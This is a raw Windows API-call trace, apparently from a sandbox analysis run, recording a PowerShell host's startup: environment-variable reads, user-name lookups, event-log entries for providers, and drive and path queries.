	[0302.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.882] CoTaskMemFree (pv=0x471920) 
	[0302.883] CoTaskMemAlloc (cb=0x804) returned 0x1b722a00
	[0302.884] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b722a00, nSize=0x28d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d288) returned 0x1
	[0302.884] CoTaskMemFree (pv=0x1b722a00) 
	[0302.884] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0302.884] GetUserNameW (in: lpBuffer=0x4b2780, pcbBuffer=0x28d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d2c8) returned 1
	[0302.884] CoTaskMemFree (pv=0x4b2780) 
	[0302.884] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fd78f8*="Alias", lpRawData=0x2fd7688) returned 1
	[0302.887] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0302.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.888] CoTaskMemFree (pv=0x471920) 
	[0302.889] CoTaskMemAlloc (cb=0x804) returned 0x1b722a00
	[0302.889] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b722a00, nSize=0x28d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d288) returned 0x1
	[0302.889] CoTaskMemFree (pv=0x1b722a00) 
	[0302.889] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0302.889] GetUserNameW (in: lpBuffer=0x4b2780, pcbBuffer=0x28d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d2c8) returned 1
	[0302.890] CoTaskMemFree (pv=0x4b2780) 
	[0302.890] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fdcef0*="Environment", lpRawData=0x2fdcc80) returned 1
	[0302.898] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0302.899] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.899] CoTaskMemFree (pv=0x471920) 
	[0302.899] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0302.899] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0302.899] CoTaskMemFree (pv=0x471920) 
	[0302.899] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0302.899] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0302.899] CoTaskMemFree (pv=0x471920) 
	[0302.900] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x28ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0302.900] SetErrorMode (uMode=0x1) returned 0x1
	[0302.900] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x28d040 | out: lpFileInformation=0x28d040*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0302.900] SetErrorMode (uMode=0x1) returned 0x1
	[0302.901] GetLogicalDrives () returned 0x4
	[0302.902] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28cba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.903] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0302.903] SetErrorMode (uMode=0x1) returned 0x1
	[0302.904] CoTaskMemAlloc (cb=0x68) returned 0x1b6ffd60
	[0302.904] CoTaskMemAlloc (cb=0x68) returned 0x1b6ff970
	[0302.904] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b6ffd60, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x28d010, lpMaximumComponentLength=0x28d00c, lpFileSystemFlags=0x28d008, lpFileSystemNameBuffer=0x1b6ff970, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28d010*=0x9c354b42, lpMaximumComponentLength=0x28d00c*=0xff, lpFileSystemFlags=0x28d008*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0302.904] CoTaskMemFree (pv=0x1b6ffd60) 
	[0302.904] CoTaskMemFree (pv=0x1b6ff970) 
	[0302.904] SetErrorMode (uMode=0x1) returned 0x1
	[0302.905] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0302.906] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cd50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.906] SetErrorMode (uMode=0x1) returned 0x1
	[0302.906] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28cfb0 | out: lpFileInformation=0x28cfb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0302.906] SetErrorMode (uMode=0x1) returned 0x1
	[0302.906] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cd50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.906] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28cc00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.906] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0302.907] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28cb30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.907] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0302.907] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.907] SetErrorMode (uMode=0x1) returned 0x1
	[0302.907] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28cde0 | out: lpFileInformation=0x28cde0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0302.908] SetErrorMode (uMode=0x1) returned 0x1
	[0302.908] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.908] SetErrorMode (uMode=0x1) returned 0x1
	[0302.908] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28cde0 | out: lpFileInformation=0x28cde0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0302.908] SetErrorMode (uMode=0x1) returned 0x1
	[0302.908] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cc20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0302.908] SetErrorMode (uMode=0x1) returned 0x1
	[0302.908] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28ce80 | out: lpFileInformation=0x28ce80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0302.908] SetErrorMode (uMode=0x1) returned 0x1
	[0302.909] CoTaskMemAlloc (cb=0x804) returned 0x1b722a00
	[0302.909] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b722a00, nSize=0x28d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d288) returned 0x1
	[0302.910] CoTaskMemFree (pv=0x1b722a00) 
	[0302.910] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0302.910] GetUserNameW (in: lpBuffer=0x4b2780, pcbBuffer=0x28d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d2c8) returned 1
	[0302.910] CoTaskMemFree (pv=0x4b2780) 
	[0302.910] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fe3fe0*="FileSystem", lpRawData=0x2fe3d70) returned 1
	[0302.913] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0302.913] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.913] CoTaskMemFree (pv=0x471920) 
	[0302.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0302.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0302.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0302.915] CoTaskMemAlloc (cb=0x804) returned 0x1b722a00
	[0302.915] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b722a00, nSize=0x28d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d288) returned 0x1
	[0302.915] CoTaskMemFree (pv=0x1b722a00) 
	[0302.915] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0302.915] GetUserNameW (in: lpBuffer=0x4b2780, pcbBuffer=0x28d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d2c8) returned 1
	[0302.915] CoTaskMemFree (pv=0x4b2780) 
	[0302.916] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fe9820*="Function", lpRawData=0x2fe95b0) returned 1
	[0302.942] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0302.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0302.942] CoTaskMemFree (pv=0x471920) 
	[0302.986] CoTaskMemAlloc (cb=0x804) returned 0x1b722a00
	[0302.986] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b722a00, nSize=0x28d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d288) returned 0x1
	[0304.063] CoTaskMemFree (pv=0x1b722a00) 
	[0304.063] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0304.063] GetUserNameW (in: lpBuffer=0x4b2780, pcbBuffer=0x28d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d2c8) returned 1
	[0304.064] CoTaskMemFree (pv=0x4b2780) 
	[0304.064] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x300c048*="Registry", lpRawData=0x300bdd8) returned 1
	[0304.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.114] CoTaskMemAlloc (cb=0x804) returned 0x1b722a00
	[0304.114] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b722a00, nSize=0x28d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d288) returned 0x1
	[0304.114] CoTaskMemFree (pv=0x1b722a00) 
	[0304.114] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0304.114] GetUserNameW (in: lpBuffer=0x4b2780, pcbBuffer=0x28d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d2c8) returned 1
	[0304.114] CoTaskMemFree (pv=0x4b2780) 
	[0304.115] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3011460*="Variable", lpRawData=0x30111f0) returned 1
	[0304.115] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0304.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.116] CoTaskMemFree (pv=0x471920) 
	[0304.117] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0304.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.117] CoTaskMemFree (pv=0x471920) 
	[0304.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0304.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0304.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0304.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0304.986] CoTaskMemAlloc (cb=0x804) returned 0x1b72c470
	[0304.986] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b72c470, nSize=0x28d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d288) returned 0x1
	[0304.987] CoTaskMemFree (pv=0x1b72c470) 
	[0304.987] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0304.987] GetUserNameW (in: lpBuffer=0x4b2780, pcbBuffer=0x28d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d2c8) returned 1
	[0304.987] CoTaskMemFree (pv=0x4b2780) 
	[0304.987] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3025078*="Certificate", lpRawData=0x3024e08) returned 1
	[0305.955] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0305.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.955] CoTaskMemFree (pv=0x471920) 
	[0305.958] GetLogicalDrives () returned 0x4
	[0305.958] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28cf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0305.958] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0305.959] CoTaskMemAlloc (cb=0x20e) returned 0x50b8c0
	[0305.959] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x50b8c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0305.959] CoTaskMemFree (pv=0x50b8c0) 
	[0305.961] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0305.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.961] CoTaskMemFree (pv=0x471920) 
	[0305.961] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0305.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.961] CoTaskMemFree (pv=0x471920) 
	[0305.983] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0305.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.983] CoTaskMemFree (pv=0x471920) 
	[0305.987] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0305.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.988] CoTaskMemFree (pv=0x471920) 
	[0305.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0305.988] SetErrorMode (uMode=0x1) returned 0x1
	[0305.989] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28ced0 | out: lpFileInformation=0x28ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0305.989] SetErrorMode (uMode=0x1) returned 0x1
	[0305.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0305.989] SetErrorMode (uMode=0x1) returned 0x1
	[0305.989] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28ced0 | out: lpFileInformation=0x28ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0305.989] SetErrorMode (uMode=0x1) returned 0x1
	[0305.990] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0305.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.990] CoTaskMemFree (pv=0x471920) 
	[0305.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0305.992] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0305.992] SetErrorMode (uMode=0x1) returned 0x1
	[0305.992] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28ce90 | out: lpFileInformation=0x28ce90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0305.992] SetErrorMode (uMode=0x1) returned 0x1
	[0305.992] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0305.993] SetErrorMode (uMode=0x1) returned 0x1
	[0305.993] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28ce90 | out: lpFileInformation=0x28ce90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0305.993] SetErrorMode (uMode=0x1) returned 0x1
	[0305.993] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cc90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0305.993] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28cb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0305.993] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0305.993] SetErrorMode (uMode=0x1) returned 0x1
	[0305.993] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28ce90 | out: lpFileInformation=0x28ce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0305.993] SetErrorMode (uMode=0x1) returned 0x1
	[0305.993] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0305.994] SetErrorMode (uMode=0x1) returned 0x1
	[0305.994] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28ce90 | out: lpFileInformation=0x28ce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0305.994] SetErrorMode (uMode=0x1) returned 0x1
	[0305.994] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0305.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x28cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0305.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0305.994] SetErrorMode (uMode=0x1) returned 0x1
